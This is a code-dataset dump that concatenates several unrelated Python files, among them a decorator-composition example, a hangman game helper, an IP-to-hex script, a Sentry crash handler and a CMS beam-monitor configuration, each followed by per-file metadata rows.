def __(*args, **kwargs):
args, kwargs = pre_process(*args, **kwargs)
return post_process(func(*args, **kwargs))
return __
return _
@takes_no_arguments
def add_one(func):
@wraps(func)
def _(*args, **kwargs):
return func(*args, **kwargs) + 1
return _
def compose(*workflows):
def extract_kwargs(workflow, kwargs):
return {x: kwargs[x] for x in inspect.getargspec(workflow).args}
def _(*args, **kwargs):
assert len(args) == 0, "Only keywords allowed."
def __(func):
@wraps(func)
def ___(*a, **k):
return func(*a, **k)
for workflow in reversed(workflows):
if hasattr(workflow, 'takes_no_arguments'):
___ = workflow(___)
else:
___ = workflow(**extract_kwargs(workflow, kwargs))(___)
___.__doc__ += workflow.__doc__ or ""
return ___
return __
return _
someworkflow = compose(contract, processing, add_one)
print someworkflow
@someworkflow(
pre_conditions=[lambda x: x == 2],
post_conditions=lambda r: r == 15,
pre_process=lambda x: ([x + 1], {}),
post_process=lambda x: x + 1, )
def somefunc(x):
"""
Very important: x must be 2!
"""
return x + 10
print somefunc(2)
help(somefunc)
| 22.372881 | 75 | 0.576894 | 292 | 2,640 | 4.907534 | 0.297945 | 0.08374 | 0.066992 | 0.044662 | 0.127704 | 0.058618 | 0.040475 | 0 | 0 | 0 | 0 | 0.007115 | 0.307955 | 2,640 | 117 | 76 | 22.564103 | 0.77723 | 0.004545 | 0 | 0.306667 | 0 | 0 | 0.037446 | 0 | 0 | 0 | 0 | 0 | 0.026667 | 0 | null | null | 0 | 0.026667 | null | null | 0.026667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
403ac1f41e289fbd9825b8c92a8b0c154ef6090e | 1,300 | py | Python | trabalhoaqui/comp_perguntas/valida.py | EmanoelG/jogodaforca | 06baf78b31e4b40d8db9fc5be67700be32c66cba | [
"MIT"
] | 1 | 2020-06-06T17:09:55.000Z | 2020-06-06T17:09:55.000Z | trabalhoaqui/comp_perguntas/valida.py | EmanoelG/jogodaforca | 06baf78b31e4b40d8db9fc5be67700be32c66cba | [
"MIT"
] | null | null | null | trabalhoaqui/comp_perguntas/valida.py | EmanoelG/jogodaforca | 06baf78b31e4b40d8db9fc5be67700be32c66cba | [
"MIT"
] | null | null | null | from jogo import desenha_jogo
from random import randint
import sys
def input_cria_usuario():
usuario = dict()
usuario['nome'] = input('Informe o seu nome: ')
usuario['pontos'] = 0
usuario['desafiado'] = False
return usuario
def comeco(j1, j2):
j1 = 1
j2 = 2
n= randint(j1,j2)
escolhildo = n
return escolhildo
# mexi a aqui
def completou(acertos, pala , jogador_adivinhao):#recebe as letras acertadass e depois verifica se a palavra esta completa
if acertos == len(pala):## e aqui
print(f'\t\t\t\t\t \033[37mJogador >> {jogador_adivinhao} << venceu !\033[m')
print("""
\033[35m
_____ ___ ___ ___ _______
/ ___| / | / |/ | | ____|
| | / | / /| /| | | |__
| | _ / /| | / / |__/ | | | __|
| |_| | / ___ | / / | | | |____
\_____//_/ |_| /_/ |_| |_______|
_____ _ _ ______ ______
/ _ \ | | / / | _____| | _ |
| | | | | | / / | |__ | |_| |
| | | | | | / / | __| | _ /
| |_| | | |/ / | |____ | | \ |
\_____/ |___/ |______| |_| \_|\033[m
""")
| 23.214286 | 127 | 0.412308 | 94 | 1,300 | 4.457447 | 0.606383 | 0.019093 | 0.02148 | 0.019093 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03383 | 0.431538 | 1,300 | 55 | 128 | 23.636364 | 0.533153 | 0.073077 | 0 | 0 | 0 | 0.030303 | 0.60401 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.242424 | 0.060606 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
403c902e2dd03cc231fcbd2349b64917b93e7dde | 826 | py | Python | scripts/ip2hex.py | Kidlike/dotfiles | b9c4daa4da1f416662b708338a497b5a620ddcbf | [
"Apache-2.0"
] | null | null | null | scripts/ip2hex.py | Kidlike/dotfiles | b9c4daa4da1f416662b708338a497b5a620ddcbf | [
"Apache-2.0"
] | null | null | null | scripts/ip2hex.py | Kidlike/dotfiles | b9c4daa4da1f416662b708338a497b5a620ddcbf | [
"Apache-2.0"
] | 1 | 2018-05-28T08:08:25.000Z | 2018-05-28T08:08:25.000Z | #!/usr/bin/python
import sys
import re
def iptohex(ip):
octets = ip.split('.')
hex_octets = []
for octet in octets:
if int(octet) < 16:
hex_octets.append('0' + hex(int(octet))[2:])
else:
hex_octets.append(hex(int(octet))[2:])
hex_octets = ''.join(hex_octets)
return hex_octets
def main():
if (len(sys.argv) != 2):
print 'Usage: ./iptohex.py x.x.x.x'
sys.exit(1)
ip = sys.argv[1]
invalidInput = re.search(r'[^0-9\.]', ip)
if invalidInput:
print 'Usage: ./iptohex.py x.x.x.x'
hex_ip = iptohex(ip)
print "Hex IP: %s " % (hex_ip)
print "Decimal IP: %s" % (ip)
if __name__ == '__main__':
main()
| 26.645161 | 68 | 0.468523 | 105 | 826 | 3.533333 | 0.380952 | 0.145553 | 0.032345 | 0.06469 | 0.123989 | 0.123989 | 0.123989 | 0.123989 | 0 | 0 | 0 | 0.019455 | 0.377724 | 826 | 30 | 69 | 27.533333 | 0.702335 | 0.01937 | 0 | 0.08 | 0 | 0 | 0.119901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.08 | null | null | 0.16 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
403cacc3c31596cf185f47bf3504df89608d6f14 | 1,329 | py | Python | src/models/CVX_weighted.py | DanqingZ/social-DCM | 3c2541a7ed0e7f4519d97783b5b673fa6c06ae94 | [
"MIT"
] | 14 | 2017-08-10T17:00:20.000Z | 2021-12-23T09:00:50.000Z | src/models/CVX_weighted.py | DanqingZ/social-DCM | 3c2541a7ed0e7f4519d97783b5b673fa6c06ae94 | [
"MIT"
] | null | null | null | src/models/CVX_weighted.py | DanqingZ/social-DCM | 3c2541a7ed0e7f4519d97783b5b673fa6c06ae94 | [
"MIT"
] | 1 | 2019-08-13T08:47:43.000Z | 2019-08-13T08:47:43.000Z | import random
import numpy as np
import numpy.linalg as LA
import scipy as spy
import time
from itertools import *
import sys
import cvxpy as cvx
from random import randint
import numpy as np
import random
from scipy.sparse import csc_matrix
from scipy import sparse as sp
import networkx as nx
class CVX_weighted:
def __init__(self, X, y, b,pos_node ,temp, Lambda, Rho):
self.X = X
self.y = y
self.value = 0
self.dim = X.shape[1]
self.Lambda = Lambda
self.Rho = Rho
self.temp = temp
self.num_nodes = nx.number_of_nodes(self.temp)
self.W = np.zeros((self.dim))
self.b = b
self.pos_node = pos_node
self.P = np.zeros((self.num_nodes,self.num_nodes))
def init_P(self):
for i in self.temp.nodes_iter():
for j in self.temp.neighbors(i):
self.P[i,j] = self.temp[i][j]['pos_edge_prob']
self.P = np.diag(np.sum(self.P,1)) - self.P
def solve(self):
dim = self.X.shape[1]
w = cvx.Variable(dim)
num_nodes = nx.number_of_nodes(self.temp)
b = cvx.Variable(num_nodes)
loss = cvx.sum_entries(cvx.mul_elemwise(np.array(self.pos_node),cvx.logistic(-cvx.mul_elemwise(self.y, self.X*w+b)))) + self.Lambda*cvx.quad_form(b,self.P)
problem = cvx.Problem(cvx.Minimize(loss))
problem.solve(verbose=False)
opt = problem.value
self.W = w.value
self.b = b.value
self.value = opt | 26.58 | 157 | 0.699774 | 242 | 1,329 | 3.731405 | 0.297521 | 0.053156 | 0.039867 | 0.033223 | 0.115172 | 0.06866 | 0.06866 | 0.06866 | 0 | 0 | 0 | 0.00363 | 0.170805 | 1,329 | 50 | 158 | 26.58 | 0.815789 | 0 | 0 | 0.088889 | 0 | 0 | 0.009774 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.311111 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
404a73f48e1b3ca8bb85958c0c604a1931f4d34f | 1,450 | py | Python | jina/executors/evaluators/rank/recall.py | sdsd0101/jina | 1a835d9015c627a2cbcdc58ee3d127962ada1bc9 | [
"Apache-2.0"
] | 2 | 2020-10-19T17:06:19.000Z | 2020-10-22T14:10:55.000Z | jina/executors/evaluators/rank/recall.py | ayansiddiqui007/jina | 2a764410de47cc11e53c8f652ea1095d5dab5435 | [
"Apache-2.0"
] | null | null | null | jina/executors/evaluators/rank/recall.py | ayansiddiqui007/jina | 2a764410de47cc11e53c8f652ea1095d5dab5435 | [
"Apache-2.0"
] | null | null | null | from typing import Sequence, Any
from jina.executors.evaluators.rank import BaseRankingEvaluator
from jina.executors.evaluators.decorators import as_aggregator
class RecallEvaluator(BaseRankingEvaluator):
"""A :class:`RecallEvaluator` evaluates the Precision of the search.
It computes how many of the first given `eval_at` groundtruth are found in the matches
"""
def __init__(self, eval_at: int, *args, **kwargs):
""""
:param eval_at: k at which evaluation is performed
"""
super().__init__(*args, **kwargs)
self.eval_at = eval_at
@property
def complete_name(self):
return f'Recall@{self.eval_at}'
@as_aggregator
def evaluate(self, matches_ids: Sequence[Any], groundtruth_ids: Sequence[Any], *args, **kwargs) -> float:
""""
:param matches_ids: the matched document identifiers from the request as matched by jina indexers and rankers
:param groundtruth_ids: the expected documents matches ids sorted as they are expected
:return the evaluation metric value for the request document
"""
ret = 0.0
for doc_id in groundtruth_ids[:self.eval_at]:
if doc_id in matches_ids:
ret += 1.0
divisor = min(self.eval_at, len(matches_ids))
if divisor == 0.0:
"""TODO: Agree on a behavior"""
return 0.0
else:
return ret / divisor
| 35.365854 | 117 | 0.648966 | 185 | 1,450 | 4.935135 | 0.459459 | 0.052574 | 0.054765 | 0.059146 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007498 | 0.264138 | 1,450 | 40 | 118 | 36.25 | 0.848172 | 0.32069 | 0 | 0 | 0 | 0 | 0.023973 | 0.023973 | 0 | 0 | 0 | 0.025 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0.047619 | 0.47619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
404be03a1fd1048c68239ebc361551f5a1526980 | 270 | py | Python | tests/schema_mapping/structures/example5.py | danny-vayu/typedpy | e97735a742acbd5f1133e23f08cf43836476686a | [
"MIT"
] | null | null | null | tests/schema_mapping/structures/example5.py | danny-vayu/typedpy | e97735a742acbd5f1133e23f08cf43836476686a | [
"MIT"
] | null | null | null | tests/schema_mapping/structures/example5.py | danny-vayu/typedpy | e97735a742acbd5f1133e23f08cf43836476686a | [
"MIT"
] | null | null | null | from typedpy import Array, DoNotSerialize, Structure, mappers
class Foo(Structure):
i: int
s: str
_serialization_mapper = {"i": "j", "s": "name"}
class Example5(Foo):
a: Array
_serialization_mapper = [{"j": DoNotSerialize}, mappers.TO_LOWERCASE] | 20.769231 | 73 | 0.674074 | 32 | 270 | 5.53125 | 0.65625 | 0.214689 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004587 | 0.192593 | 270 | 13 | 73 | 20.769231 | 0.807339 | 0 | 0 | 0 | 0 | 0 | 0.02952 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4050f12cd3fda3e62426b196e960faffe455d7f7 | 938 | py | Python | selfdrive/crash.py | darknight111/openpilot3 | a0c755fbe1889f26404a8225816f57e89fde7bc2 | [
"MIT"
] | 19 | 2020-08-05T12:11:58.000Z | 2022-03-07T01:18:56.000Z | selfdrive/crash.py | darknight111/openpilot3 | a0c755fbe1889f26404a8225816f57e89fde7bc2 | [
"MIT"
] | 18 | 2020-08-20T05:17:38.000Z | 2021-12-06T09:02:00.000Z | selfdrive/crash.py | darknight111/openpilot3 | a0c755fbe1889f26404a8225816f57e89fde7bc2 | [
"MIT"
] | 25 | 2020-08-30T09:10:14.000Z | 2022-02-20T02:31:13.000Z | """Install exception handler for process crash."""
from selfdrive.swaglog import cloudlog
from selfdrive.version import version
import sentry_sdk
from sentry_sdk.integrations.threading import ThreadingIntegration
def capture_exception(*args, **kwargs) -> None:
cloudlog.error("crash", exc_info=kwargs.get('exc_info', 1))
try:
sentry_sdk.capture_exception(*args, **kwargs)
sentry_sdk.flush() # https://github.com/getsentry/sentry-python/issues/291
except Exception:
cloudlog.exception("sentry exception")
def bind_user(**kwargs) -> None:
sentry_sdk.set_user(kwargs)
def bind_extra(**kwargs) -> None:
for k, v in kwargs.items():
sentry_sdk.set_tag(k, v)
def init() -> None:
sentry_sdk.init("https://4c138e01b37142ac8a0b73f7a4f349eb@o346458.ingest.sentry.io/5861866",
default_integrations=False, integrations=[ThreadingIntegration(propagate_hub=True)],
release=version)
| 33.5 | 102 | 0.735608 | 116 | 938 | 5.801724 | 0.5 | 0.093611 | 0.059435 | 0.077266 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045963 | 0.141791 | 938 | 27 | 103 | 34.740741 | 0.790062 | 0.105544 | 0 | 0 | 0 | 0 | 0.122449 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
405b957bd7045b5d856865ed3de04736c0fcea38 | 10,857 | py | Python | DQM/BeamMonitor/test/44X_beam_dqm_sourceclient-live_cfg.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | DQM/BeamMonitor/test/44X_beam_dqm_sourceclient-live_cfg.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | DQM/BeamMonitor/test/44X_beam_dqm_sourceclient-live_cfg.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | import FWCore.ParameterSet.Config as cms
process = cms.Process("BeamMonitor")
#----------------------------
# Common part for PP and H.I Running
#-----------------------------
process.load("DQM.Integration.test.inputsource_cfi")
#--------------------------
# HLT Filter
process.load("HLTrigger.special.HLTTriggerTypeFilter_cfi")
# 0=random, 1=physics, 2=calibration, 3=technical
process.hltTriggerTypeFilter.SelectedTriggerType = 1
#----------------------------
# DQM Live Environment
#-----------------------------
process.load("DQM.Integration.test.environment_cfi")
process.dqmEnv.subSystemFolder = 'BeamMonitor'
import DQMServices.Components.DQMEnvironment_cfi
process.dqmEnvPixelLess = DQMServices.Components.DQMEnvironment_cfi.dqmEnv.clone()
process.dqmEnvPixelLess.subSystemFolder = 'BeamMonitor_PixelLess'
#----------------------------
# BeamMonitor
#-----------------------------
process.load("DQM.BeamMonitor.BeamMonitor_cff")
process.load("DQM.BeamMonitor.BeamMonitorBx_cff")
process.load("DQM.BeamMonitor.BeamMonitor_PixelLess_cff")
process.load("DQM.BeamMonitor.BeamConditionsMonitor_cff")
#### SETUP TRACKING RECONSTRUCTION ####
process.load("Configuration.StandardSequences.GeometryRecoDB_cff")
process.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')
process.load("DQM.Integration.test.FrontierCondition_GT_cfi")
process.load("Configuration.StandardSequences.RawToDigi_Data_cff")
# Change Beam Monitor variables
if process.dqmSaver.producer.value() is "Playback":
process.dqmBeamMonitor.BeamFitter.WriteAscii = False
process.dqmBeamMonitor.BeamFitter.AsciiFileName = '/nfshome0/yumiceva/BeamMonitorDQM/BeamFitResults.txt'
process.dqmBeamMonitor.BeamFitter.WriteDIPAscii = True
process.dqmBeamMonitor.BeamFitter.DIPFileName = '/nfshome0/dqmdev/BeamMonitorDQM/BeamFitResults.txt'
else:
process.dqmBeamMonitor.BeamFitter.WriteAscii = True
process.dqmBeamMonitor.BeamFitter.AsciiFileName = '/nfshome0/yumiceva/BeamMonitorDQM/BeamFitResults.txt'
process.dqmBeamMonitor.BeamFitter.WriteDIPAscii = True
process.dqmBeamMonitor.BeamFitter.DIPFileName = '/nfshome0/dqmpro/BeamMonitorDQM/BeamFitResults.txt'
#process.dqmBeamMonitor.BeamFitter.SaveFitResults = False
#process.dqmBeamMonitor.BeamFitter.OutputFileName = '/nfshome0/yumiceva/BeamMonitorDQM/BeamFitResults.root'
process.dqmBeamMonitorBx.BeamFitter.WriteAscii = True
process.dqmBeamMonitorBx.BeamFitter.AsciiFileName = '/nfshome0/yumiceva/BeamMonitorDQM/BeamFitResults_Bx.txt'
## TKStatus
process.dqmTKStatus = cms.EDAnalyzer("TKStatus",
BeamFitter = cms.PSet(
DIPFileName = process.dqmBeamMonitor.BeamFitter.DIPFileName
)
)
process.dqmcommon = cms.Sequence(process.dqmEnv
*process.dqmSaver)
process.monitor = cms.Sequence(process.dqmBeamMonitor)
#--------------------------
# Proton-Proton Stuff
#--------------------------
if (process.runType.getRunType() == process.runType.pp_run or process.runType.getRunType() == process.runType.cosmic_run):
print "Running pp"
process.EventStreamHttpReader.SelectEvents = cms.untracked.PSet(
SelectEvents = cms.vstring('HLT_L1*',
'HLT_Jet*',
'HLT_*Cosmic*',
'HLT_HT*',
'HLT_MinBias_*',
'HLT_Physics*',
'HLT_ZeroBias_v*')
)
process.load("Configuration.StandardSequences.Reconstruction_cff")
process.load("RecoTracker.IterativeTracking.iterativeTk_cff")
## Pixelless Tracking
process.load('RecoTracker/Configuration/RecoTrackerNotStandard_cff')
process.MeasurementTracker.pixelClusterProducer = cms.string("")
# Offline Beam Spot
process.load("RecoVertex.BeamSpotProducer.BeamSpot_cff")
## Offline PrimaryVertices
import RecoVertex.PrimaryVertexProducer.OfflinePrimaryVertices_cfi
process.offlinePrimaryVertices = RecoVertex.PrimaryVertexProducer.OfflinePrimaryVertices_cfi.offlinePrimaryVertices.clone()
process.dqmBeamMonitor.OnlineMode = True
process.dqmBeamMonitor.resetEveryNLumi = 5
process.dqmBeamMonitor.resetPVEveryNLumi = 5
process.dqmBeamMonitor.PVFitter.minNrVerticesForFit = 25
process.dqmBeamMonitor.BeamFitter.TrackCollection = cms.untracked.InputTag('generalTracks')
process.offlinePrimaryVertices.TrackLabel = cms.InputTag("generalTracks")
process.offlinePrimaryVertices.label=cms.string("")
process.offlinePrimaryVertices.minNdof=cms.double(0.0)
process.offlinePrimaryVertices.useBeamConstraint=cms.bool(False)
#TriggerName for selecting pv for DIP publication, NO wildcard needed here
#it will pick all triggers which has these strings in theri name
process.dqmBeamMonitor.jetTrigger = cms.untracked.vstring("HLT_ZeroBias_v",
"HLT_Jet300_v",
"HLT_QuadJet70_v")
process.dqmBeamMonitor.hltResults = cms.InputTag("TriggerResults","","HLT")
#fast general track reco
process.iterTracking =cms.Sequence(process.InitialStep
*process.LowPtTripletStep
*process.PixelPairStep
*process.DetachedTripletStep
*process.MixedTripletStep
*process.PixelLessStep
*process.TobTecStep
*process.generalTracks)
process.tracking_FirstStep = cms.Sequence(process.siPixelDigis
*process.siStripDigis
*process.trackerlocalreco
*process.offlineBeamSpot
*process.recopixelvertexing
*process.iterTracking)
process.p = cms.Path(process.scalersRawToDigi
*process.dqmTKStatus
*process.hltTriggerTypeFilter
*process.dqmcommon
*process.tracking_FirstStep
*process.offlinePrimaryVertices
*process.monitor)
#--------------------------------------------------
# Heavy Ion Stuff
#--------------------------------------------------
if (process.runType.getRunType() == process.runType.hi_run):
print "Running HI"
process.castorDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.csctfDigis.producer = cms.InputTag("rawDataRepacker")
process.dttfDigis.DTTF_FED_Source = cms.InputTag("rawDataRepacker")
process.ecalDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.ecalPreshowerDigis.sourceTag = cms.InputTag("rawDataRepacker")
process.gctDigis.inputLabel = cms.InputTag("rawDataRepacker")
process.gtDigis.DaqGtInputTag = cms.InputTag("rawDataRepacker")
process.gtEvmDigis.EvmGtInputTag = cms.InputTag("rawDataRepacker")
process.hcalDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.muonCSCDigis.InputObjects = cms.InputTag("rawDataRepacker")
process.muonDTDigis.inputLabel = cms.InputTag("rawDataRepacker")
process.muonRPCDigis.InputLabel = cms.InputTag("rawDataRepacker")
process.scalersRawToDigi.scalersInputTag = cms.InputTag("rawDataRepacker")
#----------------------------
# Event Source
#-----------------------------
process.EventStreamHttpReader.SelectEvents = cms.untracked.PSet(
SelectEvents = cms.vstring(
'HLT_HI*'
)
)
process.dqmBeamMonitor.OnlineMode = True ## in MC the LS are not ordered??
process.dqmBeamMonitor.resetEveryNLumi = 10
process.dqmBeamMonitor.resetPVEveryNLumi = 10
process.dqmBeamMonitor.BeamFitter.MinimumTotalLayers = 3 ## using pixel triplets
process.dqmBeamMonitor.PVFitter.minNrVerticesForFit = 20
process.dqmBeamMonitor.jetTrigger = cms.untracked.vstring("HLT_HI")
process.dqmBeamMonitor.hltResults = cms.InputTag("TriggerResults","","HLT")
## Load Heavy Ion Sequence
process.load("Configuration.StandardSequences.ReconstructionHeavyIons_cff") ## HI sequences
# Select events based on the pixel cluster multiplicity
import HLTrigger.special.hltPixelActivityFilter_cfi
process.multFilter = HLTrigger.special.hltPixelActivityFilter_cfi.hltPixelActivityFilter.clone(
inputTag = cms.InputTag('siPixelClusters'),
minClusters = cms.uint32(150),
maxClusters = cms.uint32(50000)
)
process.filter_step = cms.Sequence( process.siPixelDigis
*process.siPixelClusters
#*process.multFilter
)
process.HIRecoForDQM = cms.Sequence( process.siPixelDigis
*process.siPixelClusters
*process.siPixelRecHits
*process.offlineBeamSpot
*process.hiPixelVertices
*process.hiPixel3PrimTracks
)
# use HI pixel tracking and vertexing
process.dqmBeamMonitor.BeamFitter.TrackCollection = cms.untracked.InputTag('hiPixel3PrimTracks')
process.dqmBeamMonitorBx.BeamFitter.TrackCollection = cms.untracked.InputTag('hiPixel3PrimTracks')
process.dqmBeamMonitor.primaryVertex = cms.untracked.InputTag('hiSelectedVertex')
process.dqmBeamMonitor.PVFitter.VertexCollection = cms.untracked.InputTag('hiSelectedVertex')
# make pixel vertexing less sensitive to incorrect beamspot
process.hiPixel3ProtoTracks.RegionFactoryPSet.RegionPSet.originRadius = 0.2
process.hiPixel3ProtoTracks.RegionFactoryPSet.RegionPSet.fixedError = 0.5
process.hiSelectedProtoTracks.maxD0Significance = 100
process.hiPixelAdaptiveVertex.TkFilterParameters.maxD0Significance = 100
process.hiPixelAdaptiveVertex.vertexCollections.useBeamConstraint = False
#not working due to wrong tag of reco
process.hiPixelAdaptiveVertex.vertexCollections.maxDistanceToBeam = 1.0
process.p = cms.Path(process.scalersRawToDigi
*process.dqmTKStatus
*process.hltTriggerTypeFilter
*process.filter_step
*process.HIRecoForDQM
*process.dqmcommon
*process.monitor)
| 42.410156 | 127 | 0.644377 | 840 | 10,857 | 8.264286 | 0.333333 | 0.087727 | 0.062518 | 0.057044 | 0.300202 | 0.217228 | 0.198646 | 0.103717 | 0.103717 | 0.103717 | 0 | 0.007381 | 0.23874 | 10,857 | 255 | 128 | 42.576471 | 0.832547 | 0.122225 | 0 | 0.15894 | 0 | 0 | 0.16065 | 0.105341 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.02649 | null | null | 0.013245 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4060cef76afd120f8b88cf8abb7104b1c967dfca | 2,614 | py | Python | src/zope/formlib/errors.py | zopefoundation/zope.formlib | af2d587a6eb24e59e95a8b1feb7aafc5d3b87ba4 | [
"ZPL-2.1"
] | 4 | 2018-05-09T04:16:25.000Z | 2021-03-05T17:27:21.000Z | src/zope/formlib/errors.py | zopefoundation/zope.formlib | af2d587a6eb24e59e95a8b1feb7aafc5d3b87ba4 | [
"ZPL-2.1"
] | 25 | 2016-03-24T15:23:08.000Z | 2021-03-05T16:53:53.000Z | src/zope/formlib/errors.py | zopefoundation/zope.formlib | af2d587a6eb24e59e95a8b1feb7aafc5d3b87ba4 | [
"ZPL-2.1"
] | 5 | 2015-02-11T13:32:06.000Z | 2018-05-09T04:16:26.000Z | ##############################################################################
#
# Copyright (c) 2006 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Error related things.
"""
try:
from html import escape
except ImportError: # pragma: NO COVER
from cgi import escape
from zope.component import adapter
from zope.interface import implementer
from zope.interface import Invalid
from zope.i18n import Message
from zope.i18n import translate
from zope.publisher.interfaces.browser import IBrowserRequest
from zope.publisher.browser import BrowserPage
from zope.formlib.interfaces import IWidgetInputErrorView
from zope.formlib.interfaces import IInvalidCSRFTokenError
@implementer(IWidgetInputErrorView)
@adapter(Invalid, IBrowserRequest)
class InvalidErrorView(object):
"""Display a validation error as a snippet of text."""
def __init__(self, context, request):
self.context = context
self.request = request
def snippet(self):
"""Convert a widget input error to an html snippet
>>> from zope.interface.exceptions import Invalid
>>> error = Invalid("You made an error!")
>>> InvalidErrorView(error, None).snippet()
u'<span class="error">You made an error!</span>'
"""
msg = self.context.args[0]
if isinstance(msg, Message):
msg = translate(msg, context=self.request)
return u'<span class="error">%s</span>' % escape(msg)
@adapter(IInvalidCSRFTokenError, IBrowserRequest)
class InvalidCSRFTokenErrorView(BrowserPage):
def update(self):
self.request.response.setStatus(403)
self.request.response.setHeader(
'Expires', 'Jan, 1 Jan 1970 00:00:00 GMT')
self.request.response.setHeader(
'Cache-Control', 'no-store, no-cache, must-revalidate')
self.request.response.setHeader(
'Pragma', 'no-cache')
def render(self):
msg = self.context.args[0]
if isinstance(msg, Message):
msg = translate(msg, context=self.request)
return escape(msg)
def __call__(self):
self.update()
return self.render()
| 34.394737 | 78 | 0.653405 | 298 | 2,614 | 5.704698 | 0.419463 | 0.047059 | 0.044706 | 0.049412 | 0.130588 | 0.094118 | 0.094118 | 0.094118 | 0.094118 | 0.094118 | 0 | 0.012387 | 0.197016 | 2,614 | 75 | 79 | 34.853333 | 0.797523 | 0.289594 | 0 | 0.214286 | 0 | 0 | 0.077159 | 0.014085 | 0 | 0 | 0 | 0 | 0 | 1 | 0.119048 | false | 0 | 0.285714 | 0 | 0.52381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4061946ebfbadada4a68b023604bd5475c508749 | 6,090 | py | Python | src/packagedcode/about.py | sthagen/nexB-scancode-toolkit | 12cc1286df78af898fae76fa339da2bb50ad51b9 | [
"Apache-2.0",
"CC-BY-4.0"
] | null | null | null | src/packagedcode/about.py | sthagen/nexB-scancode-toolkit | 12cc1286df78af898fae76fa339da2bb50ad51b9 | [
"Apache-2.0",
"CC-BY-4.0"
] | null | null | null | src/packagedcode/about.py | sthagen/nexB-scancode-toolkit | 12cc1286df78af898fae76fa339da2bb50ad51b9 | [
"Apache-2.0",
"CC-BY-4.0"
] | null | null | null | #
# Copyright (c) nexB Inc. and others. All rights reserved.
# ScanCode is a trademark of nexB Inc.
# SPDX-License-Identifier: Apache-2.0
# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
# See https://github.com/nexB/scancode-toolkit for support or download.
